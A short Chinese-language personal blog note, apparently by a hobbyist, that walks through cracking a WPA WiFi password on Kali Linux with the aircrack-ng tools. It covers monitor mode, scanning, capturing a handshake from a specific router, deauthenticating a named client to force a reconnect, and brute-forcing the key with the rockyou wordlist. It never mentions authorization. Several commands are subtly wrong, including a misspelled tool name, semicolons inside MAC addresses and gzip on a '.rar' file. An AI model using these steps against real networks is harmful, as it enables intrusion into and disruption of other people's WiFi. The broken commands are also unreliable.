Kali对wifi的破解记录
好记性不如烂笔头,记录一下。
我是在淘宝买的拓实N87,Kali可以识别,还行。
操作系统:Kali
开始吧。
查看一下网卡的接口。命令如下
1 airmon-ng
可以看出接口名称是wlan0mon。
接下来开启无线网卡的监听模式,命令如下
1 airmon-ng start wlan0mon #接口名称是什么这里就写什么
already enabled for 这是因为我已经开启了,背景可看出。
查看周围的wifi网络,命令如下
1 airodump-ng wlan0mon
列出来之后就按Ctrl+C停止。
抓取握手包,抓取握手包是为了暴力破解,这样子。
airodum-ng -c 13 --bssid 78:EB:14:B2:6A:50 -w ~/ wlan0mon #-c 表示指定wifi的CH的信道数值 #--bssid 就是BSSID # ~/当前文件夹下保存 #选用的接口名称
这里我选取的如上图中的是第一个wifi,执行之后结果如下图。
上图红线处左边的BSSID表示的是路由设备,右边BSSID表示挂载的设备。
这里正在等待设备连接时产生的握手包,我们可以等待新的设备连接或者掉线重连,也可以这样。
打开一个新的终端。
输入
1 aireplay-ng -0 2 -a 78:EB;14:B2:6A:50 -c C8:1E:E7:A5:3A:40 wlan0mon 2 #第一个bssid表示的是路由设备,第二个bssid表示的是挂载设备,回车之后就会断开与路由的连接,多数系统会选择自动链接,这样就抓到包了
回到之前的终端,发现如下图所示。
包已经抓到,那么结束掉Ctrl+C,开始暴力破解了。
1 aircrack-ng -a2 -b 78:EB;14:B2:6A:50 -w /usr/share/wordlists/rockyou.txt ~/*.cap
这个rockyou.txt是Kali自带的字典,如果你没有解压需要解压。
命令
1 gzip -d /usr/share/wordlists/rockyou.txt.rar
执行如下图
暴力破解看运气,要是有社工字典准确率就更高了。
